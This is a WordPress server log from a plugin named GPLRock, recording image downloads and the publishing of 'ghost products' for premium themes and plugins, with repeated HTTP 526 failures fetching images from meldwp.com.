mindtech-it-solutions-services-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df3882c6.jpg [05-Apr-2026 05:28:11 UTC] GPLRock: Using pre-downloaded image for product mindtech-it-solutions-services-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df3882c6.jpg [05-Apr-2026 05:28:11 UTC] GPLRock: Ghost product published with image - Product ID: mindtech-it-solutions-services-company-elementor-template-kit [05-Apr-2026 05:28:12 UTC] GPLRock: Image downloaded successfully for product medicalkit-health-clinical-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57482e9.webp [05-Apr-2026 05:28:12 UTC] GPLRock: Using pre-downloaded image for product medicalkit-health-clinical-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57482e9.webp [05-Apr-2026 05:28:12 UTC] GPLRock: Ghost product published with image - Product ID: medicalkit-health-clinical-care-elementor-template-kit [05-Apr-2026 05:28:14 UTC] GPLRock: Image downloaded successfully for product evenizer-event-planner-organizer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09e94ab1.jpg [05-Apr-2026 05:28:14 UTC] GPLRock: Using pre-downloaded image for product evenizer-event-planner-organizer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-09e94ab1.jpg [05-Apr-2026 05:28:14 UTC] GPLRock: Ghost product published with image - Product ID: evenizer-event-planner-organizer-elementor-template-kit [05-Apr-2026 05:28:15 UTC] GPLRock: Image downloaded successfully for product estatic-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a108b80.webp [05-Apr-2026 05:28:15 UTC] GPLRock: Using pre-downloaded image for product estatic-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a108b80.webp [05-Apr-2026 05:28:15 UTC] GPLRock: Ghost product published with image - Product ID: estatic-real-estate-elementor-template-kit [05-Apr-2026 05:28:17 UTC] GPLRock: Image downloaded successfully for product astroleeu-astrology-numerology-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-93a9a49a.jpg [05-Apr-2026 05:28:17 UTC] GPLRock: Using pre-downloaded image for product astroleeu-astrology-numerology-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-93a9a49a.jpg [05-Apr-2026 05:28:17 UTC] GPLRock: Ghost product published with image - Product ID: astroleeu-astrology-numerology-elementor-template-kit [05-Apr-2026 05:28:18 UTC] GPLRock: Image downloaded successfully for product translatepress-pro-wp-translation-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b259b6c.jpg [05-Apr-2026 05:28:18 UTC] GPLRock: Using pre-downloaded image for product translatepress-pro-wp-translation-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b259b6c.jpg [05-Apr-2026 05:28:18 UTC] GPLRock: Ghost product published with image - Product ID: translatepress-pro-wp-translation-plugin [05-Apr-2026 05:28:22 UTC] GPLRock: Image downloaded successfully for product hoteller-booking-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc263c1c.jpg [05-Apr-2026 05:28:22 UTC] GPLRock: Using pre-downloaded image for product hoteller-booking-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fc263c1c.jpg [05-Apr-2026 05:28:22 UTC] GPLRock: Ghost product published with image - Product ID: hoteller-booking-wordpress [05-Apr-2026 05:28:23 UTC] GPLRock: Image downloaded successfully for product vitepos-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1c77c98b.jpg [05-Apr-2026 05:28:24 UTC] GPLRock: Using pre-downloaded image for product vitepos-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1c77c98b.jpg [05-Apr-2026 05:28:24 UTC] GPLRock: Ghost product published with image - Product ID: vitepos-pro [05-Apr-2026 05:28:25 UTC] GPLRock: Image downloaded successfully for product botiga-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f1f48a21.jpg [05-Apr-2026 05:28:25 UTC] GPLRock: Using pre-downloaded image for product botiga-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f1f48a21.jpg [05-Apr-2026 05:28:25 UTC] GPLRock: Ghost product published with image - Product ID: botiga-pro [05-Apr-2026 05:28:26 UTC] GPLRock: Image downloaded successfully for product give-form-field-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7223cd6.jpg [05-Apr-2026 05:28:27 UTC] GPLRock: Using pre-downloaded image for product give-form-field-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7223cd6.jpg [05-Apr-2026 05:28:27 UTC] GPLRock: Ghost product published with image - Product ID: give-form-field-manager [05-Apr-2026 05:29:17 UTC] GPLRock: Image downloaded successfully for product give-zapier (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-340add10.jpg [05-Apr-2026 05:29:17 UTC] GPLRock: Using pre-downloaded image for product give-zapier: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-340add10.jpg [05-Apr-2026 05:29:17 UTC] GPLRock: Ghost product published with image - Product ID: give-zapier [05-Apr-2026 05:29:18 UTC] GPLRock: Image downloaded successfully for product ninja-forms-intelligencewp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3f3e4d8.jpg [05-Apr-2026 05:29:18 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-intelligencewp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3f3e4d8.jpg [05-Apr-2026 05:29:18 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-intelligencewp [05-Apr-2026 05:29:20 UTC] GPLRock: Image downloaded successfully for product woocommerce-notification (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-91f009b6.jpg [05-Apr-2026 05:29:20 UTC] GPLRock: Using pre-downloaded image for product woocommerce-notification: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-91f009b6.jpg [05-Apr-2026 05:29:20 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-notification [05-Apr-2026 05:29:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-shipping-new-zealand-post (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c9014d6.jpg [05-Apr-2026 05:29:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-shipping-new-zealand-post: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c9014d6.jpg [05-Apr-2026 05:29:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-shipping-new-zealand-post [05-Apr-2026 05:29:23 UTC] GPLRock: Image downloaded successfully for product bingo-multi-purpose-newspaper-magazine-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b3bc54d.jpg [05-Apr-2026 05:29:23 UTC] GPLRock: Using pre-downloaded image for product bingo-multi-purpose-newspaper-magazine-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b3bc54d.jpg [05-Apr-2026 05:29:23 UTC] GPLRock: Ghost product published with image - Product ID: bingo-multi-purpose-newspaper-magazine-theme [05-Apr-2026 05:29:24 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-checkout-fields-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f77931b.jpg [05-Apr-2026 05:29:25 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-checkout-fields-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f77931b.jpg [05-Apr-2026 05:29:25 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-checkout-fields-manager [05-Apr-2026 05:29:26 UTC] GPLRock: Image downloaded successfully for product css-igniter-neuton-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-985e57aa.jpg [05-Apr-2026 05:29:26 UTC] GPLRock: Using pre-downloaded image for product css-igniter-neuton-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-985e57aa.jpg [05-Apr-2026 05:29:26 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-neuton-wordpress-theme [05-Apr-2026 05:29:28 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-pro-sites (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e6255b0.jpg [05-Apr-2026 05:29:28 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-pro-sites: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7e6255b0.jpg [05-Apr-2026 05:29:28 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-pro-sites [05-Apr-2026 05:29:29 UTC] GPLRock: Image downloaded successfully for product mythemeshop-interactive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-79d0662a.jpg [05-Apr-2026 05:29:30 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-interactive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-79d0662a.jpg [05-Apr-2026 05:29:30 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-interactive-wordpress-theme [05-Apr-2026 05:29:31 UTC] GPLRock: Image downloaded successfully for product elmastudio-cocoa-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ae4e59f.jpg [05-Apr-2026 05:29:31 UTC] GPLRock: Using pre-downloaded image for product elmastudio-cocoa-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5ae4e59f.jpg [05-Apr-2026 05:29:31 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-cocoa-wordpress-theme [05-Apr-2026 05:30:40 UTC] GPLRock: Image download failed for product pearson-specter-lawyer-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:42 UTC] GPLRock: Image download failed for product pearson-specter-lawyer-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pearson-specter--lawyer--attorney-wordpress-theme-15475.webp for product pearson-specter-lawyer-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:30:44 UTC] GPLRock: Image download failed for product pearson-specter-lawyer-attorney-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:46 UTC] GPLRock: Image download failed for product pearson-specter-lawyer-attorney-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pearson-specter--lawyer--attorney-wordpress-theme-15475.webp for product pearson-specter-lawyer-attorney-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:30:48 UTC] GPLRock WARNING: Image download failed for product pearson-specter-lawyer-attorney-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pearson-specter--lawyer--attorney-wordpress-theme-15475.webp [05-Apr-2026 05:30:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pearson-specter-lawyer-attorney-wordpress-theme [05-Apr-2026 05:30:48 UTC] GPLRock: Image download failed for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:51 UTC] GPLRock: Image download failed for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gorgo---multi-purpose-collaborative-blog--community-buddypress-theme-14138.webp for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:30:53 UTC] GPLRock: Image download failed for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:55 UTC] GPLRock: Image download failed for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gorgo---multi-purpose-collaborative-blog--community-buddypress-theme-14138.webp for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:30:57 UTC] GPLRock WARNING: Image download failed for product gorgo-multi-purpose-collaborative-blog-community-buddypress-theme. URL: https://meldwp.com/wp-content/uploads/gorgo---multi-purpose-collaborative-blog--community-buddypress-theme-14138.webp [05-Apr-2026 05:30:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gorgo-multi-purpose-collaborative-blog-community-buddypress-theme [05-Apr-2026 05:30:57 UTC] GPLRock: Image download failed for product ascen-childcare-kids-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:30:59 UTC] GPLRock: Image download failed for product ascen-childcare-kids-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ascen---childcare--kids-education-wordpress-theme-28743.webp for product ascen-childcare-kids-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:01 UTC] GPLRock: Image download failed for product ascen-childcare-kids-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:03 UTC] GPLRock: Image download failed for product ascen-childcare-kids-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ascen---childcare--kids-education-wordpress-theme-28743.webp for product ascen-childcare-kids-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:06 UTC] GPLRock WARNING: Image download failed for product ascen-childcare-kids-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ascen---childcare--kids-education-wordpress-theme-28743.webp [05-Apr-2026 05:31:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ascen-childcare-kids-education-wordpress-theme [05-Apr-2026 05:31:06 UTC] GPLRock: Image download failed for product lab-pharmacy-laboratory-research-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:08 UTC] GPLRock: Image download failed for product lab-pharmacy-laboratory-research-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lab---pharmacy-laboratory--research-wordpress-theme-29230.webp for product lab-pharmacy-laboratory-research-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:10 UTC] GPLRock: Image download failed for product lab-pharmacy-laboratory-research-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:12 UTC] GPLRock: Image download failed for product lab-pharmacy-laboratory-research-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lab---pharmacy-laboratory--research-wordpress-theme-29230.webp for product lab-pharmacy-laboratory-research-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:14 UTC] GPLRock WARNING: Image download failed for product lab-pharmacy-laboratory-research-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lab---pharmacy-laboratory--research-wordpress-theme-29230.webp [05-Apr-2026 05:31:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lab-pharmacy-laboratory-research-wordpress-theme [05-Apr-2026 05:31:14 UTC] GPLRock: Image downloaded successfully for product brilio-personal-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-608919b6.webp [05-Apr-2026 05:31:14 UTC] GPLRock: Using pre-downloaded image for product brilio-personal-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-608919b6.webp [05-Apr-2026 05:31:14 UTC] GPLRock: Ghost product published with image - Product ID: brilio-personal-portfolio-wordpress-theme [05-Apr-2026 05:31:14 UTC] GPLRock: Image download failed for product babycare-kids-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:17 UTC] GPLRock: Image download failed for product babycare-kids-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/babycare---kids-store-woocommerce-wordpress-theme-19035.webp for product babycare-kids-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:19 UTC] GPLRock: Image download failed for product babycare-kids-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:21 UTC] GPLRock: Image download failed for product babycare-kids-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/babycare---kids-store-woocommerce-wordpress-theme-19035.webp for product babycare-kids-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:23 UTC] GPLRock WARNING: Image download failed for product babycare-kids-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/babycare---kids-store-woocommerce-wordpress-theme-19035.webp [05-Apr-2026 05:31:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: babycare-kids-store-woocommerce-wordpress-theme [05-Apr-2026 05:31:23 UTC] GPLRock: Image download failed for product frizty-pet-shop-woocommerce-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:25 UTC] GPLRock: Image download failed for product frizty-pet-shop-woocommerce-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frizty---pet-shop-woocommerce-theme--rtl-7212.webp for product frizty-pet-shop-woocommerce-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:27 UTC] GPLRock: Image download failed for product frizty-pet-shop-woocommerce-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:30 UTC] GPLRock: Image download failed for product frizty-pet-shop-woocommerce-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/frizty---pet-shop-woocommerce-theme--rtl-7212.webp for product frizty-pet-shop-woocommerce-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:32 UTC] GPLRock WARNING: Image download failed for product frizty-pet-shop-woocommerce-theme-rtl. URL: https://meldwp.com/wp-content/uploads/frizty---pet-shop-woocommerce-theme--rtl-7212.webp [05-Apr-2026 05:31:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: frizty-pet-shop-woocommerce-theme-rtl [05-Apr-2026 05:31:32 UTC] GPLRock: Image download failed for product cake-bakery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:34 UTC] GPLRock: Image download failed for product cake-bakery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cake--bakery-wordpress-theme-19267.webp for product cake-bakery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:36 UTC] GPLRock: Image download failed for product cake-bakery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:38 UTC] GPLRock: Image download failed for product cake-bakery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cake--bakery-wordpress-theme-19267.webp for product cake-bakery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:40 UTC] GPLRock WARNING: Image download failed for product cake-bakery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cake--bakery-wordpress-theme-19267.webp [05-Apr-2026 05:31:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cake-bakery-wordpress-theme [05-Apr-2026 05:31:40 UTC] GPLRock: Image download failed for product sada-a-wordpress-theme-for-blog-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:42 UTC] GPLRock: Image download failed for product sada-a-wordpress-theme-for-blog-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sada---a-wordpress-theme-for-blog--shop-24225.webp for product sada-a-wordpress-theme-for-blog-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:45 UTC] GPLRock: Image download failed for product sada-a-wordpress-theme-for-blog-shop (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:47 UTC] GPLRock: Image download failed for product sada-a-wordpress-theme-for-blog-shop (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sada---a-wordpress-theme-for-blog--shop-24225.webp for product sada-a-wordpress-theme-for-blog-shop after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:49 UTC] GPLRock WARNING: Image download failed for product sada-a-wordpress-theme-for-blog-shop. URL: https://meldwp.com/wp-content/uploads/sada---a-wordpress-theme-for-blog--shop-24225.webp [05-Apr-2026 05:31:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sada-a-wordpress-theme-for-blog-shop [05-Apr-2026 05:31:49 UTC] GPLRock: Image download failed for product howes-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:51 UTC] GPLRock: Image download failed for product howes-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/howes--responsive-multi-purpose-wordpress-theme-6282.webp for product howes-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:53 UTC] GPLRock: Image download failed for product howes-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:55 UTC] GPLRock: Image download failed for product howes-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:31:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/howes--responsive-multi-purpose-wordpress-theme-6282.webp for product howes-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:31:58 UTC] GPLRock WARNING: Image download failed for product howes-responsive-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/howes--responsive-multi-purpose-wordpress-theme-6282.webp [05-Apr-2026 05:31:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: howes-responsive-multi-purpose-wordpress-theme [05-Apr-2026 05:32:37 UTC] GPLRock: Image downloaded successfully for product jetreviews-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cadb9ae8.jpg [05-Apr-2026 05:32:37 UTC] GPLRock: Using pre-downloaded image for product jetreviews-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cadb9ae8.jpg [05-Apr-2026 05:32:37 UTC] GPLRock: Ghost product published with image - Product ID: jetreviews-for-elementor [05-Apr-2026 05:32:38 UTC] GPLRock: Image downloaded successfully for product jetstylemanager-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9049784d.jpg [05-Apr-2026 05:32:38 UTC] GPLRock: Using pre-downloaded image for product jetstylemanager-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9049784d.jpg [05-Apr-2026 05:32:38 UTC] GPLRock: Ghost product published with image - Product ID: jetstylemanager-for-elementor [05-Apr-2026 05:32:40 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-pdf-invoices (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca85cf1e.jpg [05-Apr-2026 05:32:40 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-pdf-invoices: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ca85cf1e.jpg [05-Apr-2026 05:32:40 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-pdf-invoices [05-Apr-2026 05:32:41 UTC] GPLRock: Image downloaded successfully for product mainwp-file-uploader (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-773bcb22.jpg [05-Apr-2026 05:32:41 UTC] GPLRock: Using pre-downloaded image for product mainwp-file-uploader: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-773bcb22.jpg [05-Apr-2026 05:32:41 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-file-uploader [05-Apr-2026 05:32:44 UTC] GPLRock: Image downloaded successfully for product jetsloth-gravity-forms-bulk-actions-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53a190a9.jpg [05-Apr-2026 05:32:44 UTC] GPLRock: Using pre-downloaded image for product jetsloth-gravity-forms-bulk-actions-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-53a190a9.jpg [05-Apr-2026 05:32:44 UTC] GPLRock: Ghost product published with image - Product ID: jetsloth-gravity-forms-bulk-actions-pro [05-Apr-2026 05:32:45 UTC] GPLRock: Image downloaded successfully for product dokan-woocommerce-booking-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d1a773d7.jpg [05-Apr-2026 05:32:46 UTC] GPLRock: Using pre-downloaded image for product dokan-woocommerce-booking-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d1a773d7.jpg [05-Apr-2026 05:32:46 UTC] GPLRock: Ghost product published with image - Product ID: dokan-woocommerce-booking-integration [05-Apr-2026 05:32:47 UTC] GPLRock: Image downloaded successfully for product yith-google-product-feed-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f0c9134.jpg [05-Apr-2026 05:32:47 UTC] GPLRock: Using pre-downloaded image for product yith-google-product-feed-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f0c9134.jpg [05-Apr-2026 05:32:47 UTC] GPLRock: Ghost product published with image - Product ID: yith-google-product-feed-for-woocommerce-premium [05-Apr-2026 05:32:49 UTC] GPLRock: Image downloaded successfully for product groups-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a5aeb52.jpg [05-Apr-2026 05:32:49 UTC] GPLRock: Using pre-downloaded image for product groups-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a5aeb52.jpg [05-Apr-2026 05:32:49 UTC] GPLRock: Ghost product published with image - Product ID: groups-for-woocommerce [05-Apr-2026 05:32:50 UTC] GPLRock: Image downloaded successfully for product woocommerce-store-credit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb39455c.jpg 